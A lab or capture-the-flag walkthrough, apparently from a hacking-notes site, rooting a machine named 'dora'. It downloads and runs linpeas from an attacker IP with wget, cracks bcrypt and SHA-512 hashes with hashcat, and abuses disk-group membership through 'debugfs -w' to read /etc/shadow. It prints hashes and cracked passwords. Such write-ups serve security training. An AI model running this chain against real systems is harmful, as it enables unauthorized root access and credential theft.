Privilege escalation

Checking SUID & GUID

www-data@dora:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core20/1852/usr/bin/chfn
/snap/core20/1852/usr/bin/chsh
/snap/core20/1852/usr/bin/gpasswd
/snap/core20/1852/usr/bin/mount
/snap/core20/1852/usr/bin/newgrp
/snap/core20/1852/usr/bin/passwd
/snap/core20/1852/usr/bin/su
/snap/core20/1852/usr/bin/sudo
/snap/core20/1852/usr/bin/umount
/snap/core20/1852/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1852/usr/lib/openssh/ssh-keysign
/snap/core20/1611/usr/bin/chfn
/snap/core20/1611/usr/bin/chsh
/snap/core20/1611/usr/bin/gpasswd
/snap/core20/1611/usr/bin/mount
/snap/core20/1611/usr/bin/newgrp
/snap/core20/1611/usr/bin/passwd
/snap/core20/1611/usr/bin/su
/snap/core20/1611/usr/bin/sudo
/snap/core20/1611/usr/bin/umount
/snap/core20/1611/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1611/usr/lib/openssh/ssh-keysign
/snap/snapd/18596/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/at
/usr/bin/su
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd

www-data@dora:/$ /usr/sbin/getcap -r / 2>/dev/null

/usr/sbin/getcap -r / 2>/dev/null
/snap/core20/1852/usr/bin/ping = cap_net_raw+ep
/snap/core20/1611/usr/bin/ping = cap_net_raw+ep

/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

Found nothing for privilege escalation

Running linpeas:

# In Kali Linux
python3 -m http.server -d $(dirname $(locate linpeas.sh))

# In Victim machine
cd /tmp ; wget http://192.168.45.231:8000/linpeas.sh
chmod a+x linpeas.sh
./linpeas.sh

Interesting Results:

Exploitation

In the file in the file mananger, I found that there is one config file with user related data.

Edit file: /filemanager/config/.htusers.php

<?php 
	// ensure this file is being included by a parent file
	if( !defined( '_JEXEC' ) && !defined( '_VALID_MOS' ) ) die( 'Restricted access' );
	$GLOBALS["users"]=array(
	array('admin','21232f297a57a5a743894a0e4a801fc3','/var/www/html','http://localhost','1','','7',1),
	array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),
); 
?>

We can see the password of dora user.

echo '$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS' > dora.hash

hashcat -m 3200 dora.hash  /usr/share/wordlists/rockyou.txt

dora:doraemon

Got Hash cracked.

Let's login to this user.

su dora

Got the shell as dora user.

Stabalize it.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

Now we can see that dora is a member of the disk group.

Disk Group Privilege EscalationHacking Articles

Exploiting Disk Group

We will first list the disk.

df -h

After the partition is selected, now to examine and modify the partition the debugfs utility can be used in Linux, this utility can also be used to create a directory or read the contents of a directory.

We will debug the file system using debugfs the command utility. After listing I saw that /dev/mapper/ubuntu--vg-ubuntu--lv is a file system that was root files / so, I will be connecting to this.

debugfs /dev/mapper/ubuntu--vg-ubuntu--lv

Got connected to File stytem. When tried to create a folder. It says that we have only read permission. So, I tried to read ssh key as SSH port is open in this system But that also failed to read.

Working exploit

Interesting Groups - Linux Privesc - HackTricksbook.hacktricks.wiki

This is the best way to connect.

debugfs -w /dev/mapper/ubuntu--vg-ubuntu--lv

now, I will list /etc/shadow the file.

I found that there is a credential in a hashed format.

debugfs:  cat /etc/shadow
cat /etc/shadow
root:$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.:19453:0:99999:7:::
daemon:*:19235:0:99999:7:::
bin:*:19235:0:99999:7:::
sys:*:19235:0:99999:7:::
sync:*:19235:0:99999:7:::
games:*:19235:0:99999:7:::
man:*:19235:0:99999:7:::
lp:*:19235:0:99999:7:::
mail:*:19235:0:99999:7:::
news:*:19235:0:99999:7:::
uucp:*:19235:0:99999:7:::
proxy:*:19235:0:99999:7:::
www-data:*:19235:0:99999:7:::
backup:*:19235:0:99999:7:::
list:*:19235:0:99999:7:::
irc:*:19235:0:99999:7:::
gnats:*:19235:0:99999:7:::
nobody:*:19235:0:99999:7:::
systemd-network:*:19235:0:99999:7:::
systemd-resolve:*:19235:0:99999:7:::
systemd-timesync:*:19235:0:99999:7:::
messagebus:*:19235:0:99999:7:::
syslog:*:19235:0:99999:7:::
_apt:*:19235:0:99999:7:::
tss:*:19235:0:99999:7:::
uuidd:*:19235:0:99999:7:::
tcpdump:*:19235:0:99999:7:::
landscape:*:19235:0:99999:7:::
pollinate:*:19235:0:99999:7:::
usbmux:*:19381:0:99999:7:::
sshd:*:19381:0:99999:7:::
systemd-coredump:!!:19381::::::
lxd:!:19381::::::
fwupd-refresh:*:19381:0:99999:7:::
dora:$6$PkzB/mtNayFM5eVp$b6LU19HBQaOqbTehc6/LEk8DC2NegpqftuDDAvOK20c6yf3dFo0esC0vOoNWHqvzF0aEb3jxk39sQ/S4vGoGm/:19453:0:99999:7:::

Now I will try to crack the root credential.

echo '$6$AIWcIr8PEVxEWgv1$3mFpTQAc9Kzp4BGUQ2sPYYFE/dygqhDiv2Yw.XcU.Q8n1YO05.a/4.D/x4ojQAkPnv/v7Qrw7Ici7.hs0sZiC.' > root.hash

hashcat -m 1800 root.hash /usr/share/wordlists/rockyou.txt

Now using this password (explorer ) We will switch to the root user.

Got the root privilege.

PreviousHttp NextFlags

Last updated 12 months ago

Was this helpful?

hashtagChecking SUID & GUID

hashtagRunning linpeas:

hashtagInteresting Results:

hashtagExploitation

hashtagWorking exploit

Checking SUID & GUID

Running linpeas:

Interesting Results:

Exploitation

Working exploit